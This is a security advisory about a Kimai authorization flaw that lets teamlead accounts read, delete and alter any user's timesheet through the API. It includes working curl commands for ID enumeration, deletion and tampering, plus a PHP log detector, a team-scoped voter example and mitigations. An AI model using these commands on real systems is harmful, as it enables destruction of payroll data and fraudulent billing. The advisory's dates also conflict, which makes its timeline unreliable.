Kimai, Authorization Bypass via Global Permissions, No CVE (Critical)


How the vulnerability works:

  1. In Kimai versions ≤2.55, the method `TimesheetVoter::voteOnAttribute()` performs the permission checks for timesheet operations.
  2. The voter maps permissions to either `own_timesheet` or `other_timesheet` based on whether the subject timesheet belongs to the requesting user.
  3. A developer comment inside the voter explicitly states `// extend me for "team" support later on`, confirming that team membership is never consulted.
  4. The role `ROLE_TEAMLEAD` is granted permissions `edit_other_timesheet` and `delete_other_timesheet` by design.
  5. These permissions are global – not scoped to teams the teamlead belongs to.
  6. The API endpoint `/api/timesheets/{id}` enforces exactly these permissions and nothing more; no team check is applied.
  7. Any authenticated user with `ROLE_TEAMLEAD` can read any timesheet record by its numeric ID via GET request.
  8. They can delete any timesheet via DELETE request, returning HTTP 204.
  9. They can modify any timesheet via PATCH request, changing begin/end times, description, billable flag, etc.
  10. Timesheet IDs are sequential integers, making enumeration trivial (e.g., ID 1,2,3…).
  11. The UI only lists the teamlead’s own team’s timesheets, but that is a display filter, not an authorization check; the API applies no such restriction.
  12. Plain `ROLE_USER` accounts are correctly blocked (the API returns 403 or an empty list).
  13. The maintainers acknowledge this behavior matches the documented permission model and is not a vulnerability but a missing feature.
  14. Team-scoped enforcement was always planned as an enhancement, not a security boundary.
  15. Nevertheless, the impact includes data destruction, tampering of billable hours, and full authorization bypass on timesheet resources.
  16. No user interaction is required beyond having ROLE_TEAMLEAD.
  17. The issue was verified against a Kimai 2.52.0 Docker instance.
  18. Kimai 2.56.0 introduced team-scoped timesheet permission checks as a feature.
  19. Operators of older versions must avoid granting `ROLE_TEAMLEAD` to users who must be isolated from other teams’ data.
  20. The vulnerability is effectively a design flaw that becomes a security risk in multi-tenant or team-isolated deployments.

dailycve form:

Platform: Kimai
Version: ≤2.55
Vulnerability: Global timesheet access
Severity: Critical
date: 2026-03-24

Prediction: Fixed 2.56.0 (2025-05-15)

What Undercode Says:

# Enumerate timesheet IDs (sequential integers) and record which ones exist
for i in {1..100}; do
  curl -s -o /dev/null -w "%{http_code} %{url}\n" \
    -H "X-AUTH-USER: teamlead" -H "X-AUTH-TOKEN: token" \
    "https://kimai.example/api/timesheets/$i"
done
# Read an arbitrary timesheet by ID (full record, including description and times)
curl -H "X-AUTH-USER: teamlead" -H "X-AUTH-TOKEN: token" "https://kimai.example/api/timesheets/2"
# Delete a timesheet (HTTP 204, no confirmation step)
curl -X DELETE -H "X-AUTH-USER: teamlead" -H "X-AUTH-TOKEN: token" "https://kimai.example/api/timesheets/3"
# Tamper with a timesheet: stretch the duration to 10h and overwrite the description
curl -X PATCH -H "X-AUTH-USER: teamlead" -H "X-AUTH-TOKEN: token" -H "Content-Type: application/json" \
  -d '{"begin":"2026-03-24T08:00:00","end":"2026-03-24T18:00:00","description":"TAMPERED"}' \
  "https://kimai.example/api/timesheets/6"

Exploit:

  • Authenticate as any `ROLE_TEAMLEAD` user via API token or basic auth.
  • Iterate timesheet IDs; they are small sequential integers, so no guessing is needed.
  • Send GET request to read full record including private descriptions and durations.
  • Send DELETE request to permanently remove timesheet – no confirmation required.
  • Send PATCH request to modify begin/end times (changing billable hours), description, or billable flag.
  • No team membership check is performed; all other users’ timesheets are accessible.
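The access-log footprint of the steps above is what the log monitoring recommended in the Protection section is meant to catch. The following PHP script is an added example, not part of Kimai or of the original report. It assumes a reverse-proxy log line of the constructed form `timestamp user method path status`; a default nginx or Apache combined log does not record the authenticated API user, so either the proxy log format has to be extended with that field or the detector keyed on client address instead. The sample lines are constructed for this demo.

```php
<?php
// Added example (not Kimai code): flag teamlead-style abuse of /api/timesheets/{id}.
// Two signals: an ID sweep (many distinct, mostly consecutive IDs in a short window)
// and successful DELETE/PATCH calls. Log format and sample lines are constructed.
declare(strict_types=1);

const LINE_RE = '#^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\s+(?P<user>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<status>\d{3})$#';
const TS_RE   = '#^/api/timesheets/(?P<id>\d+)(?:\?.*)?$#';

/** Parse one line; returns null for anything that is not a per-timesheet API call. */
function parseLine(string $line): ?array
{
    if (!preg_match(LINE_RE, $line, $m) || !preg_match(TS_RE, $m['path'], $p)) {
        return null;
    }
    return [
        'ts'     => strtotime($m['ts']),
        'user'   => $m['user'],
        'method' => $m['method'],
        'id'     => (int) $p['id'],
        'status' => (int) $m['status'],
    ];
}

/** Length of the longest run of consecutive integers in a sorted, de-duplicated list. */
function longestChain(array $sortedIds): int
{
    $best = $run = count($sortedIds) > 0 ? 1 : 0;
    for ($k = 1; $k < count($sortedIds); $k++) {
        $run  = ($sortedIds[$k] === $sortedIds[$k - 1] + 1) ? $run + 1 : 1;
        $best = max($best, $run);
    }
    return $best;
}

/**
 * Findings keyed by user:
 *   enumeration => true when >= $minIds distinct IDs were touched within $windowSec
 *                  and at least $minConsecutive of them form a +1 chain;
 *   writes      => "METHOD id" for every successful DELETE/PATCH on a timesheet.
 */
function analyse(array $lines, int $windowSec = 60, int $minIds = 5, int $minConsecutive = 4): array
{
    $byUser = [];
    foreach ($lines as $line) {
        if ($r = parseLine($line)) {
            $byUser[$r['user']][] = $r;
        }
    }
    $findings = [];
    foreach ($byUser as $user => $reqs) {
        usort($reqs, fn($a, $b) => $a['ts'] <=> $b['ts']);
        $enumeration = false;
        // Sliding time window over the user's requests, looking for an ID sweep.
        for ($i = 0; $i < count($reqs) && !$enumeration; $i++) {
            $ids = [];
            for ($j = $i; $j < count($reqs) && $reqs[$j]['ts'] - $reqs[$i]['ts'] <= $windowSec; $j++) {
                $ids[$reqs[$j]['id']] = true;
            }
            $ids = array_keys($ids);
            sort($ids);
            $enumeration = count($ids) >= $minIds && longestChain($ids) >= $minConsecutive;
        }
        $writes = [];
        foreach ($reqs as $r) {
            if (in_array($r['method'], ['DELETE', 'PATCH'], true) && $r['status'] >= 200 && $r['status'] < 300) {
                $writes[] = $r['method'] . ' ' . $r['id'];
            }
        }
        if ($enumeration || $writes) {
            $findings[$user] = ['enumeration' => $enumeration, 'writes' => $writes];
        }
    }
    return $findings;
}

// Constructed sample: "teamlead" sweeps IDs 1..6, then deletes and patches;
// "alice" shows ordinary own-timesheet editing, which must not trip the sweep rule.
$sample = [
    '2026-03-24T09:00:01 teamlead GET /api/timesheets/1 200',
    '2026-03-24T09:00:01 teamlead GET /api/timesheets/2 200',
    '2026-03-24T09:00:02 teamlead GET /api/timesheets/3 404',
    '2026-03-24T09:00:02 teamlead GET /api/timesheets/4 200',
    '2026-03-24T09:00:03 teamlead GET /api/timesheets/5 200',
    '2026-03-24T09:00:03 teamlead GET /api/timesheets/6 200',
    '2026-03-24T09:00:10 teamlead DELETE /api/timesheets/4 204',
    '2026-03-24T09:00:12 teamlead PATCH /api/timesheets/6 200',
    '2026-03-24T09:05:00 alice GET /api/timesheets/42 200',
    '2026-03-24T09:06:00 alice PATCH /api/timesheets/42 200',
    '2026-03-24T09:07:00 alice GET /api/timesheets 200',
];

foreach (analyse($sample) as $user => $f) {
    printf("%s: enumeration=%s writes=[%s]\n", $user, $f['enumeration'] ? 'yes' : 'no', implode(', ', $f['writes']));
}
```

On the sample, `teamlead` is reported with `enumeration=yes` and two writes, while `alice` shows only a single PATCH on one ID. A write on its own is normal (users edit their own entries), so the actionable alert is the combination of a sweep and writes from the same account, or writes from an account that should never touch other people’s records; the window and thresholds are starting points to tune against real traffic.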

Protection from this issue

  • Upgrade to Kimai 2.56.0 or later where team-scoped permissions are enforced.
  • If upgrade not possible, do not assign `ROLE_TEAMLEAD` to users who must not access other teams’ timesheets.
  • As a temporary workaround, restrict DELETE and PATCH on `/api/timesheets/` at the reverse proxy or WAF to an allowlist of API users, tokens or source addresses. The proxy cannot see Kimai roles, so this allowlist has to be maintained by hand.
  • Monitor API access logs for bursts of GET requests across consecutive timesheet IDs and for DELETE/PATCH requests on `/api/timesheets/{id}` from teamlead accounts.
  • Override `TimesheetVoter` with a custom voter that denies `*_other_timesheet` permissions unless the requester leads a team the timesheet’s owner belongs to (code modification required; re-apply after each upgrade until 2.56.0).
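The decision the walkthrough above describes (own vs. other, no team check) beside a team-scoped version of the same decision, as the last bullet suggests. This is a runnable PHP illustration added here; it is not Kimai’s `TimesheetVoter` and makes no claim about how 2.56.0 implements team scoping. The `User`, `Team` and `Timesheet` stand-ins, the `voteGlobal()` and `voteTeamScoped()` functions and the sample data are all constructed for this example.

```php
<?php
// Added illustration, not Kimai code: stand-in models plus two permission resolvers
// in the shape of a Symfony voter's voteOnAttribute(). All names are hypothetical.
declare(strict_types=1);

final class Team
{
    /** @param int[] $teamleadIds user ids leading the team; @param int[] $memberIds user ids in the team */
    public function __construct(public array $teamleadIds, public array $memberIds) {}
}

final class User
{
    /** @param string[] $permissions flat permission names granted via roles; @param Team[] $teams */
    public function __construct(public int $id, public array $permissions, public array $teams) {}

    public function hasPermission(string $permission): bool
    {
        return in_array($permission, $this->permissions, true);
    }

    /** True when this user leads at least one team that $other is a member of. */
    public function isTeamleadOf(User $other): bool
    {
        foreach ($this->teams as $team) {
            if (in_array($this->id, $team->teamleadIds, true) && in_array($other->id, $team->memberIds, true)) {
                return true;
            }
        }
        return false;
    }
}

final class Timesheet
{
    public function __construct(public int $id, public User $owner) {}
}

/**
 * Vulnerable shape: the only subject-specific fact consulted is whether the
 * timesheet belongs to the caller, so every "*_other_timesheet" grant is global.
 */
function voteGlobal(string $attribute, Timesheet $subject, User $actor): bool
{
    $scope = $subject->owner->id === $actor->id ? 'own' : 'other';
    // extend me for "team" support later on   <- the gap the article describes
    return $actor->hasPermission(sprintf('%s_%s_timesheet', $attribute, $scope));
}

/**
 * Team-scoped shape (assumed fix, not a copy of 2.56.0): "other" is only reachable
 * when the actor leads a team the timesheet owner belongs to. Global access for
 * admins would need a separately granted permission; this example does not grant one.
 */
function voteTeamScoped(string $attribute, Timesheet $subject, User $actor): bool
{
    if ($subject->owner->id === $actor->id) {
        return $actor->hasPermission(sprintf('%s_own_timesheet', $attribute));
    }
    if (!$actor->isTeamleadOf($subject->owner)) {
        return false; // owner is in none of the actor's led teams: deny before consulting roles
    }
    return $actor->hasPermission(sprintf('%s_other_timesheet', $attribute));
}

// Constructed sample data: one teamlead, one member of that team, one outsider.
$teamA    = new Team([1], [2]);
$lead     = new User(1, ['view_own_timesheet', 'view_other_timesheet', 'edit_other_timesheet', 'delete_other_timesheet'], [$teamA]);
$member   = new User(2, ['view_own_timesheet'], [$teamA]);
$outsider = new User(3, ['view_own_timesheet'], []);

$inTeam  = new Timesheet(10, $member);
$foreign = new Timesheet(11, $outsider);

foreach (['global' => 'voteGlobal', 'team-scoped' => 'voteTeamScoped'] as $label => $fn) {
    printf("%-12s delete #%d (own team):   %s\n", $label, $inTeam->id,  $fn('delete', $inTeam,  $lead) ? 'GRANTED' : 'denied');
    printf("%-12s delete #%d (other team): %s\n", $label, $foreign->id, $fn('delete', $foreign, $lead) ? 'GRANTED' : 'denied');
}
```

Run with `php voter.php`: the global resolver grants the teamlead `delete` on both timesheets, the team-scoped one grants it only on the team member’s entry and denies the outsider’s. The important design point is the order of checks in `voteTeamScoped()`: relationship first, role permission second, so a role grant can never widen access beyond the teams the caller actually leads.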

Impact

  • Permanent deletion of any user’s timesheets → loss of billable hours, payroll records, project billing history.
  • Silent modification of timesheet durations (e.g., inflating 1h to 10h) → fraudulent invoicing and payroll theft.
  • Overwriting descriptions and billable flags → corrupted audit trails and false reporting.
  • Full enumeration of all timesheet IDs → attacker can map activity across the entire system.
  • No user interaction or victim action required; trivial to execute with basic API access.


Sources:

Reported By: github.com